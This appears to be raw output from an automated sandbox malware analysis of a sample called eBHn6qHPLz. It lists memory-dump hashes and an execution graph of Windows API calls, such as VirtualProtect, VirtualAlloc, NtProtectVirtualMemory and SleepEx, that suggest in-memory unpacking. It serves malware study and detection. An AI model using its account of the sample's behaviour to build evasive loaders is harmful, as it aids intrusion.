                                                                                                • Opcode Fuzzy Hash: d6aae98a429e6b0ac29dde766539c501ef3e89a467e2ebe27896ae9d2ccdbeb5
                                                                                                • Instruction Fuzzy Hash: AD813874A14219CFDB14EFA8DA857ADBBF2FB89304F1091AAE009A3355DB345D86CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: {
                                                                                                • API String ID: 0-366298937
                                                                                                • Opcode ID: eb64102c43f636a7e31f6d71877d9c2758670c30c7a59d5cd42b6fe0a48de5cc
                                                                                                • Instruction ID: 4ea06cc0c27b3fd481dbf6b298fcaee1f13a0055fb59bf237cdfe00656c91c11
                                                                                                • Opcode Fuzzy Hash: eb64102c43f636a7e31f6d71877d9c2758670c30c7a59d5cd42b6fe0a48de5cc
                                                                                                • Instruction Fuzzy Hash: 6831BBB1D056588FDB5ACF6B8D502DABBF7AFC9200F08C1FA9448AB255DA340B46CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: {
                                                                                                • API String ID: 0-366298937
                                                                                                • Opcode ID: e8e559f493173452592a5db1dbba1637d70347f0e54914b838e7c2a5ad3e7510
                                                                                                • Instruction ID: a2cc0fb0f65cbb4cea37e63801d1e95e50d797737ca27112b4e49574a85e8519
                                                                                                • Opcode Fuzzy Hash: e8e559f493173452592a5db1dbba1637d70347f0e54914b838e7c2a5ad3e7510
                                                                                                • Instruction Fuzzy Hash: 36318BB1D156288BEB5DCF6BDD502DAFAFBAFC8600F04D1FA940CA6255DB740B818E40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9e5a9f24244437e491e750ad535cfae8ad6af9750193dfcfaecb78892e0fcf04
                                                                                                • Instruction ID: 2f34ad570339eead4f8bca1beb0ee64870be019b12d351f1a19c6ea3ef2c75f4
                                                                                                • Opcode Fuzzy Hash: 9e5a9f24244437e491e750ad535cfae8ad6af9750193dfcfaecb78892e0fcf04
                                                                                                • Instruction Fuzzy Hash: 6B12B470E006198FDB54CFAAC9806DDFBF2BF88304F25C56AD418AB21AD734A946CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b9d88849f0bd52dcdd2dc2dd7d8bf5a821e903da6f85f8c282a85ba0c797a8c1
                                                                                                • Instruction ID: e59801fc7edb2e6de23523874019c73691181782001aacfa08a00daec317b1e7
                                                                                                • Opcode Fuzzy Hash: b9d88849f0bd52dcdd2dc2dd7d8bf5a821e903da6f85f8c282a85ba0c797a8c1
                                                                                                • Instruction Fuzzy Hash: F81294F2C917658BE710CF65E94C18A3BB1BB41328BD04A09D2652F6E1DFB8916BCF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1342c282eabdd1d59d3870bc1694c43bfdac669d13f8524bdd5b3d4513c4a9f5
                                                                                                • Instruction ID: 4fbd95610c896c9b222c96e4abe3ca3870a86adaad678991a9d0b6c815b53f34
                                                                                                • Opcode Fuzzy Hash: 1342c282eabdd1d59d3870bc1694c43bfdac669d13f8524bdd5b3d4513c4a9f5
                                                                                                • Instruction Fuzzy Hash: C7D13F74E05208CFEB18DFA5D985BAEBBF2FB49304F1490AAD519A7385DB306985CF04
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 547e0f813b15713569d1542bf3f330645b03d4cc36ed7720aed1fa72c79969ce
                                                                                                • Instruction ID: 0f32e15d64302633a324e912f25ebbd153ad232ceaa8be2585a54404ba619cdd
                                                                                                • Opcode Fuzzy Hash: 547e0f813b15713569d1542bf3f330645b03d4cc36ed7720aed1fa72c79969ce
                                                                                                • Instruction Fuzzy Hash: E7A18A36E002598FCF05DFA5C84049EBBF2FF84304B25956AE805BB325EB31E956CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9962bf5ba94fe97fb786bd8501e0c5a74fca0e2f878315d4407b1aa506cf3f2d
                                                                                                • Instruction ID: 982a63edf12fee9470f08c52d24a9a2544fefed496dc2565e863360c41d8436e
                                                                                                • Opcode Fuzzy Hash: 9962bf5ba94fe97fb786bd8501e0c5a74fca0e2f878315d4407b1aa506cf3f2d
                                                                                                • Instruction Fuzzy Hash: D9A1F270E14248CFDB14DF69D985BAEBBF1FB89304F2094AAE419A7255EB306D85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ed242d8812d622fe9b458898ac4e07992c1ec4fe790b099ce0f9f3c409c2920e
                                                                                                • Instruction ID: e5736f91f79950baae2e5a0238a40acdbf0e911beb81c9c10c4b96f5578c8b32
                                                                                                • Opcode Fuzzy Hash: ed242d8812d622fe9b458898ac4e07992c1ec4fe790b099ce0f9f3c409c2920e
                                                                                                • Instruction Fuzzy Hash: 2EA1F270E14208CFDB14DF69D985BAEBBF1FB49304F2094AAD419A7255EB346D85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 184cb0bf0caf2f3a65605653633409ca9f37526aa4dfa211726b047620f0bbc8
                                                                                                • Instruction ID: d7894b0c26f15a0682045e72fe03a185396f7c629ac7993dff6de28fb301ef9f
                                                                                                • Opcode Fuzzy Hash: 184cb0bf0caf2f3a65605653633409ca9f37526aa4dfa211726b047620f0bbc8
                                                                                                • Instruction Fuzzy Hash: 58C11AB2C907658BD710CF65E94818A7BB1FB85328FD04A09D1616F2E1DFB8A06BCF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891811113.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6830000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7a3b1df2a172dac829dc2c5fcae1a037613354cc8ffb865032c3ce3248f1cca0
                                                                                                • Instruction ID: 9938732b40733d8243d2339776cccafbc92be72127a47d82e096319c39375a49
                                                                                                • Opcode Fuzzy Hash: 7a3b1df2a172dac829dc2c5fcae1a037613354cc8ffb865032c3ce3248f1cca0
                                                                                                • Instruction Fuzzy Hash: D9916D74E14218CFEB54DFA8D585AAEB7F2FB89304F20516AE409A7394CF345941CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891811113.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6830000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0eae4d12ef8c2c6e3b842927a6d6af9db098b481d4f6b868f4b3fc6c68c68ed0
                                                                                                • Instruction ID: 1187a7d324b7fdbd9dcd0423611c794d0ac76348a26c5f51a36a0e19b760c9ac
                                                                                                • Opcode Fuzzy Hash: 0eae4d12ef8c2c6e3b842927a6d6af9db098b481d4f6b868f4b3fc6c68c68ed0
                                                                                                • Instruction Fuzzy Hash: C0916B74E14218CFEB54EFA8D585AAEB7F2FB89304F20516AE409AB394CF745941CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891811113.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6830000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32df409c7d3a6c18680c4744ed7ee24fb29c64f6ae06e78b649da65612fb3501
                                                                                                • Instruction ID: 255098ef52e5e00aa7f1cb8f667bfd1fa88e835b1253b50fd3b5affe0e5292c3
                                                                                                • Opcode Fuzzy Hash: 32df409c7d3a6c18680c4744ed7ee24fb29c64f6ae06e78b649da65612fb3501
                                                                                                • Instruction Fuzzy Hash: AC914A30E15218CFEB54EF69D985BAEB7F5FB89308F1090AAD51AA7255DF305881CF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891954330.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6870000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d44aa93bd5098b76c900072de616285afd0388f83edb1531c5fae1141a0710c0
                                                                                                • Instruction ID: 961099ffeb932c8e3d97f10394ef19ae4063cb9c5b96cad77177d4630c4ba4ce
                                                                                                • Opcode Fuzzy Hash: d44aa93bd5098b76c900072de616285afd0388f83edb1531c5fae1141a0710c0
                                                                                                • Instruction Fuzzy Hash: 2991F870E0521CCFEBA4EF69C848BADBBB2BF49304F1084A9D509E7295DB745A85CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d7211790c96a33963968719b3cddb0b2a940200acf2c5f9c147f1d08a716cef6
                                                                                                • Instruction ID: db3ef2a7bd1f84a38ca73ff189d6881936fe25a87bfc43448cf6e82ae48f0f3c
                                                                                                • Opcode Fuzzy Hash: d7211790c96a33963968719b3cddb0b2a940200acf2c5f9c147f1d08a716cef6
                                                                                                • Instruction Fuzzy Hash: 2F91F370E14208CFDB14DF69D985BAEBBF1FB49304F2090AAD419A7659DB30AD85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891811113.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6830000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ace239ac988c7a6d3b5a4c77f2bc03939d02d7578821f3d9f4917473f5434e7
                                                                                                • Instruction ID: 61e1a60c02c1c5da6ca3d0cd6e724678e5660a00f0f658f8ce9c31e54ad52197
                                                                                                • Opcode Fuzzy Hash: 1ace239ac988c7a6d3b5a4c77f2bc03939d02d7578821f3d9f4917473f5434e7
                                                                                                • Instruction Fuzzy Hash: AB815B30E15218CFEB54EF68D945BAEB7F2FB89308F1080AAD41AA7255DF305885CF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5be49a6fb85872525007f91d1b914f4b7d2ac43b4e810a96924d6233f7825450
                                                                                                • Instruction ID: 6cd8063c26168e2827f681d0e4c05b5fbd8ae484af5726b5429bf306defd6d57
                                                                                                • Opcode Fuzzy Hash: 5be49a6fb85872525007f91d1b914f4b7d2ac43b4e810a96924d6233f7825450
                                                                                                • Instruction Fuzzy Hash: E2415571A85218EFDF61DFA8D5847EDBBF2EB49305F1050AAD009A7349EB34AC85CB40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 737a160fc7b608b343e33b82b40d59d795a014f8b8a2125a1b1a538c94ec9725
                                                                                                • Instruction ID: 2d4698bc0a37f62e68ab723c2ad5ee1be319cafb7cd7c50a3bda4f66e66a68e8
                                                                                                • Opcode Fuzzy Hash: 737a160fc7b608b343e33b82b40d59d795a014f8b8a2125a1b1a538c94ec9725
                                                                                                • Instruction Fuzzy Hash: 2C513575A41218EFDF21DFA8D5847EDBBF2EB49305F1050AAD009A7349EB34AD85CB40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6ed006cbd992486560e5ebbbdacb3f0cebec2fc6cbcc626dc001debded37828
                                                                                                • Instruction ID: 59a378763327029b7d2623a9860292cfcf98ae596f964547ca9143744367c0b3
                                                                                                • Opcode Fuzzy Hash: b6ed006cbd992486560e5ebbbdacb3f0cebec2fc6cbcc626dc001debded37828
                                                                                                • Instruction Fuzzy Hash: 6B4156B1E016198BDB48CFABD94069EFBF3AFC8310F14C17AD918AB224DB345942CB54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 318268520cc96ed39ca9f4706646c619fc1e3ef1a433f9bd152b75379aafe4cf
                                                                                                • Instruction ID: 10250d18cbd6c28bf0d8cdd400214d313032f0d0cf25a85a95b0985abbb3857b
                                                                                                • Opcode Fuzzy Hash: 318268520cc96ed39ca9f4706646c619fc1e3ef1a433f9bd152b75379aafe4cf
                                                                                                • Instruction Fuzzy Hash: E24158B5E016199BDB48CFABD94069EFBF3BFC8310F14C07AD918AB224DB3459468B54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891664630.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6620000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6be00ce7c2f43116701e83aec67a1baed3b1222b9c279e9e9fe7f0a09c7485a5
                                                                                                • Instruction ID: ec4798d63c6c959492a324bd3057f2a7d4baeeca343ec1719371c946fa28f354
                                                                                                • Opcode Fuzzy Hash: 6be00ce7c2f43116701e83aec67a1baed3b1222b9c279e9e9fe7f0a09c7485a5
                                                                                                • Instruction Fuzzy Hash: DC514471D05A298BE76CCF2B8D557DAFAF3AFC9300F44C1FA950C66254DB704A868E41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891664630.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6620000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 961cb58ff3b3df012112270ccdee80ac6f67be11ec7722d22f763b0f79c92cbb
                                                                                                • Instruction ID: ef8ee1b022555e66f14326c2240c6808c3d92866088b0b83bc7e5fd8fcd063a8
                                                                                                • Opcode Fuzzy Hash: 961cb58ff3b3df012112270ccdee80ac6f67be11ec7722d22f763b0f79c92cbb
                                                                                                • Instruction Fuzzy Hash: F8514071D056588BE72CCF2B8D456CAFAF3AFC9300F44C1FA954CA6265DB340A868E41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7a92db29a068cebd44e953f7e5259f1646539efb82fac189efe3953f0ca49d3e
                                                                                                • Instruction ID: 4e613a9b12ef5b1a1dee8e6602adba70c2448e61c451f9650bc0af560ec32ca1
                                                                                                • Opcode Fuzzy Hash: 7a92db29a068cebd44e953f7e5259f1646539efb82fac189efe3953f0ca49d3e
                                                                                                • Instruction Fuzzy Hash: 6A414171E01A188FEB5CCF6BDD4069EFAF3AFC9301F54D1BA9408AA259DB3006428F41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c64e8e5872e364b9a6e4926c0420ccc56d8550f27bec5df8d682dbea3447f3ef
                                                                                                • Instruction ID: 295ba9d2297ad0a4e3493293de16d656e8da0696bac5edd5606a3af03d9c7e32
                                                                                                • Opcode Fuzzy Hash: c64e8e5872e364b9a6e4926c0420ccc56d8550f27bec5df8d682dbea3447f3ef
                                                                                                • Instruction Fuzzy Hash: 82312571E01A189BEB5CCF6BDD4069EFAF7AFC9301F54C17A981CAA258EB3405468F41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                • API String ID: 0-723292480
                                                                                                • Opcode ID: 577e6c16432d657815c600022b086bbeaba0fb36fa0659593f702bf99c2a03ae
                                                                                                • Instruction ID: 3d5a7e19b2669ace34f15a1a43eaa6891f30a27e902bed5e5e31707d1074c602
                                                                                                • Opcode Fuzzy Hash: 577e6c16432d657815c600022b086bbeaba0fb36fa0659593f702bf99c2a03ae
                                                                                                • Instruction Fuzzy Hash: 67518530A402098FC744EF79C95076FBAE7BFC8740F148968C44997769DF35E94687A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (_^q$(_^q$(_^q$(_^q
                                                                                                • API String ID: 0-2697572114
                                                                                                • Opcode ID: 06921e73674e986b4acf729d4200d846b9ef0e252a69ac5b0fcf244e79d78a34
                                                                                                • Instruction ID: a428621dcfd4a6429c27f81d014e73e68152e8a0695faee92636c369059fa192
                                                                                                • Opcode Fuzzy Hash: 06921e73674e986b4acf729d4200d846b9ef0e252a69ac5b0fcf244e79d78a34
                                                                                                • Instruction Fuzzy Hash: 35619175F042089FDB04EF78C4555AEBBB2EF89304F2084A9E5069B365EB35EC46CB91

                                                                                                Execution Graph

                                                                                                Execution Coverage:11.6%
                                                                                                Dynamic/Decrypted Code Coverage:99.3%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:273
                                                                                                Total number of Limit Nodes:11
                                                                                                execution_graph 52507 18acb18 52508 18acb1d GetCurrentProcess 52507->52508 52510 18acba9 52508->52510 52511 18acbb0 GetCurrentThread 52508->52511 52510->52511 52512 18acbed GetCurrentProcess 52511->52512 52513 18acbe6 52511->52513 52514 18acc23 52512->52514 52513->52512 52515 18acc4b GetCurrentThreadId 52514->52515 52516 18acc7c 52515->52516 52517 18a4698 52518 18a4699 52517->52518 52521 18a3e70 52518->52521 52520 18a46af 52522 18a3e7b 52521->52522 52525 18a4250 52522->52525 52524 18a46d5 52524->52520 52526 18a425b 52525->52526 52529 18a4260 52526->52529 52528 18a476d 52528->52524 52530 18a426b 52529->52530 52533 18a43f8 52530->52533 52532 18a4842 52532->52528 52534 18a4403 52533->52534 52537 18a4428 52534->52537 52536 18a4954 52536->52532 52538 18a4433 52537->52538 52539 18a76e0 52538->52539 52547 18a7988 52538->52547 52554 18a7470 52539->52554 52541 18a7750 52543 18a793b 52541->52543 52559 18aa359 52541->52559 52542 18a7979 52542->52536 52543->52542 52563 18ac441 52543->52563 52548 18a791a 52547->52548 52549 18a7993 52548->52549 52550 18a793b 52548->52550 52552 18aa359 GetModuleHandleW 52548->52552 52549->52539 52551 18a7979 52550->52551 52553 18ac441 3 API calls 52550->52553 52551->52539 52552->52550 52553->52551 52555 18a747b 52554->52555 52556 18a8f3a 52555->52556 52568 18a8f98 52555->52568 52572 18a8f89 52555->52572 52556->52541 52576 18aa37f 52559->52576 52580 18aa390 52559->52580 52560 18aa36e 52560->52543 52564 18ac471 52563->52564 52565 18ac495 52564->52565 52588 18ac5fb 52564->52588 52592 18ac600 52564->52592 52565->52542 52569 18a8fdb 52568->52569 52570 18a8fe6 KiUserCallbackDispatcher 52569->52570 52571 18a9010 52569->52571 52570->52571 52571->52556 52573 18a8fdb 52572->52573 52574 18a9010 52573->52574 52575 18a8fe6 KiUserCallbackDispatcher 52573->52575 52574->52556 52575->52574 52577 18aa390 52576->52577 52583 18aa488 52577->52583 52578 18aa39f 52578->52560 52582 18aa488 GetModuleHandleW 52580->52582 52581 18aa39f 52581->52560 52582->52581 52584 18aa4bc 52583->52584 52585 18aa499 52583->52585 52584->52578 52585->52584 52586 18aa6c0 GetModuleHandleW 52585->52586 52587 18aa6ed 52586->52587 52587->52578 52590 18ac60d 52588->52590 52589 18ac647 52589->52565 52590->52589 52596 18aae60 52590->52596 52594 18ac60d 52592->52594 52593 18ac647 52593->52565 52594->52593 52595 18aae60 3 API calls 52594->52595 52595->52593 52597 18aae6b 52596->52597 52599 18ad358 52597->52599 52600 18ac764 52597->52600 52599->52599 52601 18ac76f 52600->52601 52602 18a4428 3 API calls 52601->52602 52603 18ad3c7 52602->52603 52603->52599 52604 6c43850 52606 6c4d7f0 VirtualProtect 52604->52606 52605 6c401db 52606->52605 52491 6c4a441 52492 6c4a460 52491->52492 52495 6c4d7f0 52492->52495 52497 6c4d817 52495->52497 52499 6c4dc40 52497->52499 52500 6c4dc88 VirtualProtect 52499->52500 52502 6c4a48b 52500->52502 52607 6c42e63 52608 6c42e82 52607->52608 52610 6c4d7f0 VirtualProtect 52608->52610 52609 6c42ea9 52610->52609 52611 6a76310 52612 6a76315 52611->52612 52616 6a76341 52612->52616 52621 6a76350 52612->52621 52613 6a7633b 52618 6a76350 52616->52618 52617 6a765c0 52617->52613 52618->52617 52626 6a79a30 52618->52626 52630 6a79a38 52618->52630 52622 6a76355 52621->52622 52623 6a765c0 52622->52623 52624 6a79a30 SleepEx 52622->52624 52625 6a79a38 SleepEx 52622->52625 52623->52613 52624->52622 52625->52622 52627 6a79a78 SleepEx 52626->52627 52629 6a79ab6 52627->52629 52629->52618 52631 6a79a78 SleepEx 52630->52631 52633 6a79ab6 52631->52633 52633->52618 52831 17dd104 52832 17dd11c 52831->52832 52833 17dd177 52832->52833 52835 6c4e248 52832->52835 52836 6c4e270 52835->52836 52839 6c4ead8 52836->52839 52837 6c4e297 52840 6c4eb05 52839->52840 52841 6c4d7f0 VirtualProtect 52840->52841 52843 6c4ec9b 52840->52843 52842 6c4ec8c 52841->52842 52842->52837 52843->52837 52824 18acd60 52825 18acd65 DuplicateHandle 52824->52825 52826 18acdf6 52825->52826 52827 6c4f028 52828 6c4f068 VirtualAlloc 52827->52828 52830 6c4f0a2 52828->52830 52503 6b7b6b8 52504 6b7b6fb NtProtectVirtualMemory 52503->52504 52506 6b7b750 52504->52506 52634 6b727e8 52635 6b727fd 52634->52635 52641 6b72828 52635->52641 52646 6b7281b 52635->52646 52651 6b7294d 52635->52651 52656 6b72d9d 52635->52656 52636 6b72813 52643 6b7282d 52641->52643 52642 6b7298a 52642->52636 52643->52642 52661 6b73cc9 52643->52661 52665 6b73cd8 52643->52665 52648 6b72828 52646->52648 52647 6b7298a 52647->52636 52648->52647 52649 6b73cc9 10 API calls 52648->52649 52650 6b73cd8 10 API calls 52648->52650 52649->52648 52650->52648 52653 6b7287f 52651->52653 52652 6b7298a 52652->52636 52653->52652 52654 6b73cc9 10 API calls 52653->52654 52655 6b73cd8 10 API calls 52653->52655 52654->52653 52655->52653 52658 6b7287f 52656->52658 52657 6b7298a 52657->52636 52658->52657 52659 6b73cc9 10 API calls 52658->52659 52660 6b73cd8 10 API calls 52658->52660 52659->52658 52660->52658 52662 6b73ced 52661->52662 52669 6b73eec 52662->52669 52666 6b73ced 52665->52666 52668 6b73eec 10 API calls 52666->52668 52667 6b73d0f 52667->52643 52668->52667 52670 6b73f04 52669->52670 52674 6b74630 52670->52674 52689 6b74640 52670->52689 52671 6b73d0f 52671->52643 52675 6b74655 52674->52675 52704 6b74e1a 52675->52704 52709 6b74e9b 52675->52709 52714 6b7564e 52675->52714 52719 6b7483e 52675->52719 52724 6b7489f 52675->52724 52729 6b74d71 52675->52729 52734 6b74941 52675->52734 52739 6b748e4 52675->52739 52744 6b74fc5 52675->52744 52749 6b75755 52675->52749 52754 6b74926 52675->52754 52759 6b74f67 52675->52759 52676 6b74677 52676->52671 52690 6b74655 52689->52690 52692 6b74f67 2 API calls 52690->52692 52693 6b74926 2 API calls 52690->52693 52694 6b75755 2 API calls 52690->52694 52695 6b74fc5 2 API calls 52690->52695 52696 6b748e4 2 API calls 52690->52696 52697 6b74941 2 API calls 52690->52697 52698 6b74d71 2 API calls 52690->52698 52699 6b7489f 2 API calls 52690->52699 52700 6b7483e 2 API calls 52690->52700 52701 6b7564e 2 API calls 52690->52701 52702 6b74e9b 2 API calls 52690->52702 52703 6b74e1a 2 API calls 52690->52703 52691 6b74677 52691->52671 52692->52691 52693->52691 52694->52691 52695->52691 52696->52691 52697->52691 52698->52691 52699->52691 52700->52691 52701->52691 52702->52691 52703->52691 52705 6b74e24 